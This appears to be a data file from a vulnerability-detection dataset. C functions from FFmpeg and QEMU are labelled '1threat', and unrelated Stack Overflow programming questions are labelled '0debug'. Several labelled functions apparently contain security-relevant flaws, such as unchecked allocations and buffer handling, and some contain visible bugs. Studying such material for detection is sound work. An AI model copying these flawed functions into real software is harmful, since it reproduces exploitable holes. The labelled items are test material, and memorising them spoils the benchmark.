(avctx->rc_initial_buffer_occupancy <= avctx->rc_buffer_size)) {
x4->params.rc.f_vbv_buffer_init =
(float)avctx->rc_initial_buffer_occupancy / avctx->rc_buffer_size;
} else
x4->params.rc.f_vbv_buffer_init = 0.9;
x4->params.rc.f_ip_factor = 1 / fabs(avctx->i_quant_factor);
x4->params.rc.f_pb_factor = avctx->b_quant_factor;
x4->params.analyse.i_chroma_qp_offset = avctx->chromaoffset;
x4->params.analyse.b_psnr = avctx->flags & AV_CODEC_FLAG_PSNR;
x4->params.i_log_level = XAVS_LOG_DEBUG;
x4->params.i_threads = avctx->thread_count;
x4->params.b_interlaced = avctx->flags & AV_CODEC_FLAG_INTERLACED_DCT;
if (avctx->flags & AV_CODEC_FLAG_GLOBAL_HEADER)
x4->params.b_repeat_headers = 0;
x4->enc = xavs_encoder_open(&x4->params);
if (!x4->enc)
return -1;
if (!(x4->pts_buffer = av_mallocz((avctx->max_b_frames+1) * sizeof(*x4->pts_buffer))))
return AVERROR(ENOMEM);
if (avctx->flags & AV_CODEC_FLAG_GLOBAL_HEADER) {
xavs_nal_t *nal;
int nnal, s, i, size;
uint8_t *p;
s = xavs_encoder_headers(x4->enc, &nal, &nnal);
avctx->extradata = p = av_malloc(s);
for (i = 0; i < nnal; i++) {
if (nal[i].i_type == NAL_SEI) {
x4->sei = av_malloc( 5 + nal[i].i_payload * 4 / 3 );
if (xavs_nal_encode(x4->sei, &x4->sei_size, 1, nal + i) < 0)
return -1;
continue;
}
size = xavs_nal_encode(p, &s, 1, nal + i);
if (size < 0)
return -1;
p += size;
}
avctx->extradata_size = p - avctx->extradata;
}
return 0;
}
| 1threat
|
How do I display RSS feeds from other web sites : <p>I am trying to display a blog: <a href="http://miletich2.blogspot.co.uk/" rel="nofollow">http://miletich2.blogspot.co.uk/</a> on my clients Wordpress site and as I have been looking around people have been recommending <code>simple pie</code> and their demo works great, but their Wordpress plugin hasn't been updated in 2 years and has loads of bugs.</p>
<p>Does any one know of another plugin that has the same functionality? Any help would be appreciated!</p>
| 0debug
|
uint32_t HELPER(lpdbr)(CPUS390XState *env, uint32_t f1, uint32_t f2)
{
float64 v1;
float64 v2 = env->fregs[f2].d;
v1 = float64_abs(v2);
env->fregs[f1].d = v1;
return set_cc_nz_f64(v1);
}
| 1threat
|
static inline uint32_t vmsvga_fifo_read_raw(struct vmsvga_state_s *s)
{
uint32_t cmd = s->fifo[CMD(stop) >> 2];
s->cmd->stop = cpu_to_le32(CMD(stop) + 4);
if (CMD(stop) >= CMD(max))
s->cmd->stop = s->cmd->min;
return cmd;
}
| 1threat
|
static av_cold int psy_3gpp_init(FFPsyContext *ctx) {
AacPsyContext *pctx;
float bark;
int i, j, g, start;
float prev, minscale, minath, minsnr, pe_min;
int chan_bitrate = ctx->avctx->bit_rate / ((ctx->avctx->flags & CODEC_FLAG_QSCALE) ? 2.0f : ctx->avctx->channels);
const int bandwidth = ctx->avctx->cutoff ? ctx->avctx->cutoff : AAC_CUTOFF(ctx->avctx);
const float num_bark = calc_bark((float)bandwidth);
ctx->model_priv_data = av_mallocz(sizeof(AacPsyContext));
if (!ctx->model_priv_data)
return AVERROR(ENOMEM);
pctx = (AacPsyContext*) ctx->model_priv_data;
pctx->global_quality = (ctx->avctx->global_quality ? ctx->avctx->global_quality : 120) * 0.01f;
if (ctx->avctx->flags & CODEC_FLAG_QSCALE) {
chan_bitrate = (int)(chan_bitrate / 120.0 * (ctx->avctx->global_quality ? ctx->avctx->global_quality : 120));
}
pctx->chan_bitrate = chan_bitrate;
pctx->frame_bits = FFMIN(2560, chan_bitrate * AAC_BLOCK_SIZE_LONG / ctx->avctx->sample_rate);
pctx->pe.min = 8.0f * AAC_BLOCK_SIZE_LONG * bandwidth / (ctx->avctx->sample_rate * 2.0f);
pctx->pe.max = 12.0f * AAC_BLOCK_SIZE_LONG * bandwidth / (ctx->avctx->sample_rate * 2.0f);
ctx->bitres.size = 6144 - pctx->frame_bits;
ctx->bitres.size -= ctx->bitres.size % 8;
pctx->fill_level = ctx->bitres.size;
minath = ath(3410 - 0.733 * ATH_ADD, ATH_ADD);
for (j = 0; j < 2; j++) {
AacPsyCoeffs *coeffs = pctx->psy_coef[j];
const uint8_t *band_sizes = ctx->bands[j];
float line_to_frequency = ctx->avctx->sample_rate / (j ? 256.f : 2048.0f);
float avg_chan_bits = chan_bitrate * (j ? 128.0f : 1024.0f) / ctx->avctx->sample_rate;
float bark_pe = 0.024f * PSY_3GPP_BITS_TO_PE(avg_chan_bits) / num_bark;
float en_spread_low = j ? PSY_3GPP_EN_SPREAD_LOW_S : PSY_3GPP_EN_SPREAD_LOW_L;
float en_spread_hi = (j || (chan_bitrate <= 22.0f)) ? PSY_3GPP_EN_SPREAD_HI_S : PSY_3GPP_EN_SPREAD_HI_L1;
i = 0;
prev = 0.0;
for (g = 0; g < ctx->num_bands[j]; g++) {
i += band_sizes[g];
bark = calc_bark((i-1) * line_to_frequency);
coeffs[g].barks = (bark + prev) / 2.0;
prev = bark;
}
for (g = 0; g < ctx->num_bands[j] - 1; g++) {
AacPsyCoeffs *coeff = &coeffs[g];
float bark_width = coeffs[g+1].barks - coeffs->barks;
coeff->spread_low[0] = pow(10.0, -bark_width * PSY_3GPP_THR_SPREAD_LOW);
coeff->spread_hi [0] = pow(10.0, -bark_width * PSY_3GPP_THR_SPREAD_HI);
coeff->spread_low[1] = pow(10.0, -bark_width * en_spread_low);
coeff->spread_hi [1] = pow(10.0, -bark_width * en_spread_hi);
pe_min = bark_pe * bark_width;
minsnr = exp2(pe_min / band_sizes[g]) - 1.5f;
coeff->min_snr = av_clipf(1.0f / minsnr, PSY_SNR_25DB, PSY_SNR_1DB);
}
start = 0;
for (g = 0; g < ctx->num_bands[j]; g++) {
minscale = ath(start * line_to_frequency, ATH_ADD);
for (i = 1; i < band_sizes[g]; i++)
minscale = FFMIN(minscale, ath((start + i) * line_to_frequency, ATH_ADD));
coeffs[g].ath = minscale - minath;
start += band_sizes[g];
}
}
pctx->ch = av_mallocz_array(ctx->avctx->channels, sizeof(AacPsyChannel));
if (!pctx->ch) {
av_freep(&ctx->model_priv_data);
return AVERROR(ENOMEM);
}
lame_window_init(pctx, ctx->avctx);
return 0;
}
| 1threat
|
UIView Extension to Center View : <p>In my viewcontroller I can center a textField with:</p>
<p><code>textField.center = CGPoint(x: view.bounds.midX, y: textField.center.y)</code></p>
<p>Why doesn't my extension work:</p>
<pre><code>extension UIView {
func centerHorizontally() {
self.center = CGPoint(x: self.superview!.bounds.midX, y: self.center.y)
}
// back in viewcontroller
emailField.centerHorizontally()
</code></pre>
| 0debug
|
Interpreting the sum of TF-IDF scores of words across documents : <p>First let's extract the TF-IDF scores per term per document:</p>
<pre><code>from gensim import corpora, models, similarities
documents = ["Human machine interface for lab abc computer applications",
"A survey of user opinion of computer system response time",
"The EPS user interface management system",
"System and human system engineering testing of EPS",
"Relation of user perceived response time to error measurement",
"The generation of random binary unordered trees",
"The intersection graph of paths in trees",
"Graph minors IV Widths of trees and well quasi ordering",
"Graph minors A survey"]
stoplist = set('for a of the and to in'.split())
texts = [[word for word in document.lower().split() if word not in stoplist] for document in documents]
dictionary = corpora.Dictionary(texts)
corpus = [dictionary.doc2bow(text) for text in texts]
tfidf = models.TfidfModel(corpus)
corpus_tfidf = tfidf[corpus]
</code></pre>
<p>Printing it out:</p>
<pre><code>for doc in corpus_tfidf:
print doc
</code></pre>
<p>[out]:</p>
<pre><code>[(0, 0.4301019571350565), (1, 0.4301019571350565), (2, 0.4301019571350565), (3, 0.4301019571350565), (4, 0.2944198962221451), (5, 0.2944198962221451), (6, 0.2944198962221451)]
[(4, 0.3726494271826947), (7, 0.27219160459794917), (8, 0.3726494271826947), (9, 0.27219160459794917), (10, 0.3726494271826947), (11, 0.5443832091958983), (12, 0.3726494271826947)]
[(6, 0.438482464916089), (7, 0.32027755044706185), (9, 0.32027755044706185), (13, 0.6405551008941237), (14, 0.438482464916089)]
[(5, 0.3449874408519962), (7, 0.5039733231394895), (14, 0.3449874408519962), (15, 0.5039733231394895), (16, 0.5039733231394895)]
[(9, 0.21953536176370683), (10, 0.30055933182961736), (12, 0.30055933182961736), (17, 0.43907072352741366), (18, 0.43907072352741366), (19, 0.43907072352741366), (20, 0.43907072352741366)]
[(21, 0.48507125007266594), (22, 0.48507125007266594), (23, 0.48507125007266594), (24, 0.48507125007266594), (25, 0.24253562503633297)]
[(25, 0.31622776601683794), (26, 0.31622776601683794), (27, 0.6324555320336759), (28, 0.6324555320336759)]
[(25, 0.20466057569885868), (26, 0.20466057569885868), (29, 0.2801947048062438), (30, 0.40932115139771735), (31, 0.40932115139771735), (32, 0.40932115139771735), (33, 0.40932115139771735), (34, 0.40932115139771735)]
[(8, 0.6282580468670046), (26, 0.45889394536615247), (29, 0.6282580468670046)]
</code></pre>
<p>If we want to find the "saliency" or "importance" of the words within this corpus, <strong>can we simple do the sum of the tf-idf scores across all documents and divide it by the number of documents?</strong> I.e. </p>
<pre><code>>>> tfidf_saliency = Counter()
>>> for doc in corpus_tfidf:
... for word, score in doc:
... tfidf_saliency[word] += score / len(corpus_tfidf)
...
>>> tfidf_saliency
Counter({7: 0.12182694202050007, 8: 0.11121194156107769, 26: 0.10886469856464989, 29: 0.10093919463036093, 9: 0.09022272408985754, 14: 0.08705221175200946, 25: 0.08482488519466996, 6: 0.08143359568202602, 10: 0.07480097322359022, 12: 0.07480097322359022, 4: 0.07411881371164887, 13: 0.07117278898823597, 5: 0.07104525967490458, 27: 0.07027283689263066, 28: 0.07027283689263066, 11: 0.060487023243988705, 15: 0.055997035904387725, 16: 0.055997035904387725, 21: 0.05389680556362955, 22: 0.05389680556362955, 23: 0.05389680556362955, 24: 0.05389680556362955, 17: 0.048785635947490406, 18: 0.048785635947490406, 19: 0.048785635947490406, 20: 0.048785635947490406, 0: 0.04778910634833961, 1: 0.04778910634833961, 2: 0.04778910634833961, 3: 0.04778910634833961, 30: 0.045480127933079706, 31: 0.045480127933079706, 32: 0.045480127933079706, 33: 0.045480127933079706, 34: 0.045480127933079706})
</code></pre>
<p>Looking at the output, could we assume that the most "prominent" word in the corpus is:</p>
<pre><code>>>> dictionary[7]
u'system'
>>> dictionary[8]
u'survey'
>>> dictionary[26]
u'graph'
</code></pre>
<p>If so, <strong>what is the mathematical interpretation of the sum of TF-IDF scores of words across documents?</strong></p>
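<p>For concreteness, one way to write down the quantity the loop above computes (assuming gensim's default weighting, which L2-normalises each document, so that tfidf(w, d) = tf(w, d) * idf(w) / ||d|| with ||d|| the norm of the document's tf-idf vector) is:</p>
<pre><code>S(w) = \frac{1}{|D|} \sum_{d \in D} \mathrm{tfidf}(w, d)
     = \mathrm{idf}(w) \cdot \frac{1}{|D|} \sum_{d \in D} \frac{\mathrm{tf}(w, d)}{\lVert d \rVert}
</code></pre>
<p>i.e. idf(w) times the average length-normalised term frequency of w per document; is that a fair way to read it?</p>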
| 0debug
|
When click "clear data", database is deleting. How i solve this : I want to don't delete database of application when click the "clear data" button. How i solve my problem..
I searched but could not find something.
Please help, thanks..
| 0debug
|
SwiftUI: How to remove margin between views in VStack? : <p>Using SwiftUI, I created a VStack, which contains some fixed elements and a list element. The reason is, that the user should only scroll the area under the fixed elements. Now I see a space between the second fixed element and the list. I don't know where this space is coming from and want to get rid of it, but have no idea, how. The area is marked in red.</p>
<pre><code>struct DashboardView : View, CoreDataInjected {
var body: some View {
GeometryReader { geometry in
VStack {
ScopeSelectorView().frame(maxWidth: .infinity).background(ColorPalette.gray)
BalanceNumberView().frame(maxWidth: .infinity)
List {
DashboardNavigationView(
height: geometry.size.height - ScopeSelectorView.height - BalanceNumberView.height
).frame(maxWidth: .infinity).listRowInsets(.zero)
}
}
}.background(Color.red).edgesIgnoringSafeArea(.all)
}
}
</code></pre>
<p><a href="https://i.stack.imgur.com/0wWsp.png" rel="noreferrer"><img src="https://i.stack.imgur.com/0wWsp.png" alt="Screenshot of view"></a></p>
| 0debug
|
char_socket_get_addr(Object *obj, Visitor *v, const char *name,
void *opaque, Error **errp)
{
SocketChardev *s = SOCKET_CHARDEV(obj);
visit_type_SocketAddress(v, name, &s->addr, errp);
}
| 1threat
|
static unsigned int dec_btstq(DisasContext *dc)
{
TCGv l0;
dc->op1 = EXTRACT_FIELD(dc->ir, 0, 4);
DIS(fprintf (logfile, "btstq %u, $r%d\n", dc->op1, dc->op2));
cris_cc_mask(dc, CC_MASK_NZ);
l0 = tcg_temp_local_new(TCG_TYPE_TL);
cris_alu(dc, CC_OP_BTST,
l0, cpu_R[dc->op2], tcg_const_tl(dc->op1), 4);
cris_update_cc_op(dc, CC_OP_FLAGS, 4);
t_gen_mov_preg_TN(dc, PR_CCS, l0);
dc->flags_uptodate = 1;
tcg_temp_free(l0);
return 2;
}
| 1threat
|
Split a string in C# : <p>I have a string containing the text "<strong>AA55BB10CC1DD10E123</strong>". I have to split the string and place it in a List as text / value fields like </p>
<p>AA | 55</p>
<p>BB | 10</p>
<p>CC | 1</p>
<p>DD | 10</p>
<p>E | 123</p>
<p>Thanks</p>
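<p>To make the intended pairing concrete, this is the kind of letters/digits split I am after, sketched here in Python purely to illustrate the pattern (the same regex idea should carry over to C#):</p>
<pre><code>import re

pairs = re.findall(r"([A-Za-z]+)(\d+)", "AA55BB10CC1DD10E123")
print(pairs)   # [('AA', '55'), ('BB', '10'), ('CC', '1'), ('DD', '10'), ('E', '123')]
</code></pre>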
| 0debug
|
Jenkins Pipeline docker.build() gives error '"docker build" requires exactly 1 argument(s)' : <p>With this minimal Jenkins Pipeline script</p>
<pre><code>node {
docker.build("foo", "--build-arg x=y")
}
</code></pre>
<p>I'm getting a confusing error</p>
<blockquote>
<p>"docker build" requires exactly 1 argument(s).</p>
</blockquote>
<p>But as per the documentation, the signature of <code>docker.build()</code> is <code>build(image[, args])</code> (from Jenkins <code>/job/dockerbug/pipeline-syntax/globals#docker</code>)</p>
<blockquote>
<p><code>build(image[, args])</code></p>
<p>Runs docker build to create and tag the specified
image from a Dockerfile in the current directory. Additional args may
be added, such as <code>'-f Dockerfile.other --pull --build-arg
http_proxy=http://192.168.1.1:3128 .'</code>. Like docker build, args must
end with the build context. Returns the resulting Image object.
Records a FROM fingerprint in the build.</p>
</blockquote>
<p>What's going on?</p>
| 0debug
|
static inline void RENAME(yuv2yuv1)(int16_t *lumSrc, int16_t *chrSrc,
uint8_t *dest, uint8_t *uDest, uint8_t *vDest, long dstW, long chrDstW)
{
#ifdef HAVE_MMX
if (uDest)
{
asm volatile(
YSCALEYUV2YV121
:: "r" (chrSrc + chrDstW), "r" (uDest + chrDstW),
"g" (-chrDstW)
: "%"REG_a
);
asm volatile(
YSCALEYUV2YV121
:: "r" (chrSrc + 2048 + chrDstW), "r" (vDest + chrDstW),
"g" (-chrDstW)
: "%"REG_a
);
}
asm volatile(
YSCALEYUV2YV121
:: "r" (lumSrc + dstW), "r" (dest + dstW),
"g" (-dstW)
: "%"REG_a
);
#else
int i;
for (i=0; i<dstW; i++)
{
int val= lumSrc[i]>>7;
if (val&256){
if (val<0) val=0;
else val=255;
}
dest[i]= val;
}
if (uDest)
for (i=0; i<chrDstW; i++)
{
int u=chrSrc[i]>>7;
int v=chrSrc[i + 2048]>>7;
if ((u|v)&256){
if (u<0) u=0;
else if (u>255) u=255;
if (v<0) v=0;
else if (v>255) v=255;
}
uDest[i]= u;
vDest[i]= v;
}
#endif
}
| 1threat
|
static av_always_inline void blend_image_packed_rgb(AVFilterContext *ctx,
AVFrame *dst, const AVFrame *src,
int main_has_alpha, int x, int y,
int is_straight)
{
OverlayContext *s = ctx->priv;
int i, imax, j, jmax;
const int src_w = src->width;
const int src_h = src->height;
const int dst_w = dst->width;
const int dst_h = dst->height;
uint8_t alpha;
const int dr = s->main_rgba_map[R];
const int dg = s->main_rgba_map[G];
const int db = s->main_rgba_map[B];
const int da = s->main_rgba_map[A];
const int dstep = s->main_pix_step[0];
const int sr = s->overlay_rgba_map[R];
const int sg = s->overlay_rgba_map[G];
const int sb = s->overlay_rgba_map[B];
const int sa = s->overlay_rgba_map[A];
const int sstep = s->overlay_pix_step[0];
uint8_t *S, *sp, *d, *dp;
i = FFMAX(-y, 0);
sp = src->data[0] + i * src->linesize[0];
dp = dst->data[0] + (y+i) * dst->linesize[0];
for (imax = FFMIN(-y + dst_h, src_h); i < imax; i++) {
j = FFMAX(-x, 0);
S = sp + j * sstep;
d = dp + (x+j) * dstep;
for (jmax = FFMIN(-x + dst_w, src_w); j < jmax; j++) {
alpha = S[sa];
if (main_has_alpha && alpha != 0 && alpha != 255) {
uint8_t alpha_d = d[da];
alpha = UNPREMULTIPLY_ALPHA(alpha, alpha_d);
}
switch (alpha) {
case 0:
break;
case 255:
d[dr] = S[sr];
d[dg] = S[sg];
d[db] = S[sb];
break;
default:
d[dr] = is_straight ? FAST_DIV255(d[dr] * (255 - alpha) + S[sr] * alpha) : FAST_DIV255(d[dr] * (255 - alpha) + S[sr]);
d[dg] = is_straight ? FAST_DIV255(d[dg] * (255 - alpha) + S[sg] * alpha) : FAST_DIV255(d[dr] * (255 - alpha) + S[sr]);
d[db] = is_straight ? FAST_DIV255(d[db] * (255 - alpha) + S[sb] * alpha) : FAST_DIV255(d[dr] * (255 - alpha) + S[sr]);
}
if (main_has_alpha) {
switch (alpha) {
case 0:
break;
case 255:
d[da] = S[sa];
break;
default:
d[da] += FAST_DIV255((255 - d[da]) * S[sa]);
}
}
d += dstep;
S += sstep;
}
dp += dst->linesize[0];
sp += src->linesize[0];
}
}
| 1threat
|
create table empty : <p>How can you create an empty table from an existing table?</p>
| 0debug
|
How to debounce user input in reactjs using rxjs : <p>My problem may be a trivial one but I wasn't able to find the answer so far. </p>
<p>How can I defer (debounce) updating state in React while user is typing, to avoid unnecessary updates?</p>
<p>Having <code><input onChange={this.onChange} .../></code>, how can I bind onChange event with rxjs? Should I try to make this input observable or should I use FromEventPattern?</p>
<p>In both cases I have no idea how to bind React events with rxjs.
The second question is whether the user will see any input changes during debounce?</p>
| 0debug
|
ladder-like C++ virtual inheritance : <p>If I have a class inheritance relation like the following</p>
<pre><code> a
/ \
b c
\ |
| d
\/ \
e f
\ /
g
</code></pre>
<p>Is the following the correct definition?</p>
<pre><code> class A {};
class B: public virtual A {};
class C: public virtual A {};
class D: public C {};
class E: public B, public virtual D {};
class F: public virtual D {};
class G: public E, public F {};
</code></pre>
<p>I made both A and D virtually inherited because I assume each joint class need to be virtual.</p>
<p>Also I am not sure how C++ defines the constructor order of the above case. The link
<a href="https://isocpp.org/wiki/faq/multiple-inheritance#mi-vi-ctor-order" rel="noreferrer">https://isocpp.org/wiki/faq/multiple-inheritance#mi-vi-ctor-order</a> says</p>
<blockquote>
<p>The very first constructors to be executed are the virtual base
classes anywhere in the hierarchy. They are executed in the order they
appear in a depth-first left-to-right traversal of the graph of base
classes, where left to right refer to the order of appearance of base
class names.</p>
<p>After all virtual base class constructors are finished, the
construction order is generally from base class to derived class. The
details are easiest to understand if you imagine that the very first
thing the compiler does in the derived class’s ctor is to make a
hidden call to the ctors of its non-virtual base classes (hint: that’s
the way many compilers actually do it). So if class D inherits
multiply from B1 and B2, the constructor for B1 executes first, then
the constructor for B2, then the constructor for D. This rule is
applied recursively; for example, if B1 inherits from B1a and B1b, and
B2 inherits from B2a and B2b, then the final order is B1a, B1b, B1,
B2a, B2b, B2, D.</p>
<p>Note that the order B1 and then B2 (or B1a then B1b) is determined by
the order that the base classes appear in the declaration of the
class, not in the order that the initializer appears in the derived
class’s initialization list.</p>
</blockquote>
<p>If so, is the order like?</p>
<pre><code> A, D, B, C, D, F, G
</code></pre>
<p>I do not expect D is constructed before C. What is the correct constructor order?</p>
| 0debug
|
void timerlist_notify(QEMUTimerList *timer_list)
{
if (timer_list->notify_cb) {
timer_list->notify_cb(timer_list->notify_opaque);
} else {
qemu_notify_event();
}
}
| 1threat
|
IE8 - media query is not rendering : <p>I've got a very curious case in IE8 where the media query is not working on the URL (the mobile view shows on desktop), but if I use the IP address then it works (the desktop view shows). I tried a whole lot of things, even several solutions from Stack Overflow, but couldn't succeed. It seems like a respond.js issue but I'm not sure. Can anyone please help me with this?</p>
<p>URL: <a href="https://www.uhc.com/" rel="nofollow">https://www.uhc.com/</a></p>
<p>IP: 149.111.148.170</p>
<p>FYI: I'm using IE 11 developer Tool to check it on IE8.</p>
| 0debug
|
Coding a function in python which counts the number of occurrences : <p>I am a beginner in Python and I would like to write a function that takes a variable number of parameters. This function must count the number of occurrences of each character that appears in all the input strings.
Let's call this function carCompt.</p>
<p>For example :</p>
<pre><code>carCompt("Sophia","Raphael","Alexandre")
</code></pre>
<p>the result should be:</p>
<pre><code>{'A':5,
'D':1,
'E':3,
'H':2,
'L':1,
'N':1,
'O':1,
'P':2,
'R':2,
'S':1,
'X':1}
</code></pre>
<p>thank you for help!!</p>
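<p>A minimal sketch of one way this could look, using *args for the variable number of parameters and collections.Counter for the counting (assuming characters should be counted case-insensitively and reported upper-cased, as in the sample above):</p>
<pre><code>from collections import Counter

def carCompt(*names):
    counts = Counter()
    for name in names:
        counts.update(name.upper())   # count every character of every string
    return dict(sorted(counts.items()))

print(carCompt("Sophia", "Raphael", "Alexandre"))
</code></pre>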
| 0debug
|
Comparing integer and string without converting in VB : I am comparing an integer and a string in VB.
Please check the following code:<br/> <br/> <code>Dim strPrice as String = "9" <br/> If CInt(Int(txtPrice.Text)) < strPrice Then <br/> <pre> return false <br/> End If </code> <br/> <br/> Is it possible to compare without converting both of them to integer?
| 0debug
|
Java - number in expanded form : <p>I am given a number and want it returned as a String in expanded form. For example</p>
<pre><code>expandedForm(12); # Should return "10 + 2"
expandedForm(42); # Should return "40 + 2"
expandedForm(70304); # Should return "70000 + 300 + 4"
</code></pre>
<p>My function works for first and second case, but with 70304 it gives this: </p>
<pre><code>70 + 00 + 300 + 000 + 4
</code></pre>
<p>Here's my code</p>
<pre><code>import java.util.Arrays;
public static String expandedForm(int num)
{
String[] str = Integer.toString(num).split("");
String result = "";
for(int i = 0; i < str.length-1; i++) {
if(Integer.valueOf(str[i]) > 0) {
for(int j = i; j < str.length-1; j++) {
str[j] += '0';
}
}
}
result = Arrays.toString(str);
result = result.substring(1, result.length()-1).replace(",", " +");
System.out.println(result);
return result;
}
</code></pre>
<p>I think there's a problem with the second loop, but can't figure out why.</p>
| 0debug
|
static void usage(const char *name)
{
(printf) (
"Usage: %s [OPTIONS] FILE\n"
"QEMU Disk Network Block Device Server\n"
"\n"
" -h, --help display this help and exit\n"
" -V, --version output version information and exit\n"
"\n"
"Connection properties:\n"
" -p, --port=PORT port to listen on (default `%d')\n"
" -b, --bind=IFACE interface to bind to (default `0.0.0.0')\n"
" -k, --socket=PATH path to the unix socket\n"
" (default '"SOCKET_PATH"')\n"
" -e, --shared=NUM device can be shared by NUM clients (default '1')\n"
" -t, --persistent don't exit on the last connection\n"
" -v, --verbose display extra debugging information\n"
"\n"
"Exposing part of the image:\n"
" -o, --offset=OFFSET offset into the image\n"
" -P, --partition=NUM only expose partition NUM\n"
"\n"
#ifdef __linux__
"Kernel NBD client support:\n"
" -c, --connect=DEV connect FILE to the local NBD device DEV\n"
" -d, --disconnect disconnect the specified device\n"
"\n"
#endif
"\n"
"Block device options:\n"
" -f, --format=FORMAT set image format (raw, qcow2, ...)\n"
" -r, --read-only export read-only\n"
" -s, --snapshot use FILE as an external snapshot, create a temporary\n"
" file with backing_file=FILE, redirect the write to\n"
" the temporary one\n"
" -l, --load-snapshot=SNAPSHOT_PARAM\n"
" load an internal snapshot inside FILE and export it\n"
" as an read-only device, SNAPSHOT_PARAM format is\n"
" 'snapshot.id=[ID],snapshot.name=[NAME]', or\n"
" '[ID_OR_NAME]'\n"
" -n, --nocache disable host cache\n"
" --cache=MODE set cache mode (none, writeback, ...)\n"
#ifdef CONFIG_LINUX_AIO
" --aio=MODE set AIO mode (native or threads)\n"
#endif
" --discard=MODE set discard mode (ignore, unmap)\n"
" --detect-zeroes=MODE set detect-zeroes mode (off, on, unmap)\n"
"\n"
"Report bugs to <[email protected]>\n"
, name, NBD_DEFAULT_PORT, "DEVICE");
}
| 1threat
|
static SchroBuffer *find_next_parse_unit(SchroParseUnitContext *parse_ctx)
{
SchroBuffer *enc_buf = NULL;
int next_pu_offset = 0;
unsigned char *in_buf;
if (parse_ctx->buf_size < 13 ||
parse_ctx->buf[0] != 'B' ||
parse_ctx->buf[1] != 'B' ||
parse_ctx->buf[2] != 'C' ||
parse_ctx->buf[3] != 'D')
return NULL;
next_pu_offset = (parse_ctx->buf[5] << 24) +
(parse_ctx->buf[6] << 16) +
(parse_ctx->buf[7] << 8) +
parse_ctx->buf[8];
if (next_pu_offset == 0 &&
SCHRO_PARSE_CODE_IS_END_OF_SEQUENCE(parse_ctx->buf[4]))
next_pu_offset = 13;
if (next_pu_offset <= 0 || parse_ctx->buf_size < next_pu_offset)
return NULL;
in_buf = av_malloc(next_pu_offset);
if (!in_buf) {
av_log(parse_ctx, AV_LOG_ERROR, "Unable to allocate input buffer\n");
return NULL;
}
memcpy(in_buf, parse_ctx->buf, next_pu_offset);
enc_buf = schro_buffer_new_with_data(in_buf, next_pu_offset);
enc_buf->free = libschroedinger_decode_buffer_free;
enc_buf->priv = in_buf;
parse_ctx->buf += next_pu_offset;
parse_ctx->buf_size -= next_pu_offset;
return enc_buf;
}
| 1threat
|
SQL query for SSRS report : I have
period balance
1 100
1 200
2 300
2 400
3 400
3 500
I need to show this in the SSRS report like below.
I would like to calculate the sum for the max period as the first column (maxsum),
then the sum for the second max period, which is 2, and so on:
3 2 1
900 700 300
thanks
| 0debug
|
How to make YouTube and Vimeo Videos Responsive? : <p>I want to make embedded video from youtube and vimeo responsive.</p>
| 0debug
|
bool cpu_physical_memory_is_io(target_phys_addr_t phys_addr)
{
MemoryRegionSection *section;
section = phys_page_find(phys_addr >> TARGET_PAGE_BITS);
return !(memory_region_is_ram(section->mr) ||
memory_region_is_romd(section->mr));
}
| 1threat
|
Sparql query for SQL query : What will be the Sparql query for
Select empname from mytable
Where empid=1;
| 0debug
|
What does using a shift operator(<<) before a variable implies in C? : <p>I read a code to convert a number to its binary equivalent, where the following statement was used:</p>
<pre><code>1<<j
</code></pre>
<p>What is the use of such a statement?</p>
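<p>From what I can tell, 1<<j is just the integer whose only set bit is bit j (numerically 2 to the power j), so it can be used as a mask to test or set the j-th bit of a number; is that the idea here? A small illustration of what I mean (written in Python, but the expressions behave the same way in C):</p>
<pre><code>n = 13                        # binary 1101
for j in range(4):
    mask = 1 << j             # 1, 2, 4, 8: only bit j is set
    print(j, bool(n & mask))  # is bit j of n set?
</code></pre>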
| 0debug
|
increment for loop by date php : I am trying to increment the date to a new date, but it is not showing any result.
$ed = strtotime($endDate);
for($i = $ed; $i <= strtotime($today); $i = $ed ){
$toArray['d'] = $ed;
$startDate = date('y-m-d', strtotime("+1 day", strtotime($endDate)));
$endDate = date('y-m-d', strtotime("+13 day", strtotime($startDate)));
$ed = strtotime($endDate);
}
It is not working. What's wrong?
| 0debug
|
build_rsdp(GArray *rsdp_table, GArray *linker, unsigned rsdt)
{
AcpiRsdpDescriptor *rsdp = acpi_data_push(rsdp_table, sizeof *rsdp);
bios_linker_loader_alloc(linker, ACPI_BUILD_RSDP_FILE, 16,
true );
memcpy(&rsdp->signature, "RSD PTR ", sizeof(rsdp->signature));
memcpy(rsdp->oem_id, ACPI_BUILD_APPNAME6, sizeof(rsdp->oem_id));
rsdp->length = cpu_to_le32(sizeof(*rsdp));
rsdp->revision = 0x02;
rsdp->rsdt_physical_address = cpu_to_le32(rsdt);
bios_linker_loader_add_pointer(linker, ACPI_BUILD_RSDP_FILE,
ACPI_BUILD_TABLE_FILE,
rsdp_table, &rsdp->rsdt_physical_address,
sizeof rsdp->rsdt_physical_address);
rsdp->checksum = 0;
bios_linker_loader_add_checksum(linker, ACPI_BUILD_RSDP_FILE,
rsdp, rsdp, sizeof *rsdp, &rsdp->checksum);
return rsdp_table;
}
| 1threat
|
int cmdutils_read_file(const char *filename, char **bufptr, size_t *size)
{
int ret;
FILE *f = fopen(filename, "rb");
if (!f) {
av_log(NULL, AV_LOG_ERROR, "Cannot read file '%s': %s\n", filename,
strerror(errno));
return AVERROR(errno);
}
fseek(f, 0, SEEK_END);
*size = ftell(f);
fseek(f, 0, SEEK_SET);
*bufptr = av_malloc(*size + 1);
if (!*bufptr) {
av_log(NULL, AV_LOG_ERROR, "Could not allocate file buffer\n");
fclose(f);
return AVERROR(ENOMEM);
}
ret = fread(*bufptr, 1, *size, f);
if (ret < *size) {
av_free(*bufptr);
if (ferror(f)) {
av_log(NULL, AV_LOG_ERROR, "Error while reading file '%s': %s\n",
filename, strerror(errno));
ret = AVERROR(errno);
} else
ret = AVERROR_EOF;
} else {
ret = 0;
(*bufptr)[(*size)++] = '\0';
}
fclose(f);
return ret;
}
| 1threat
|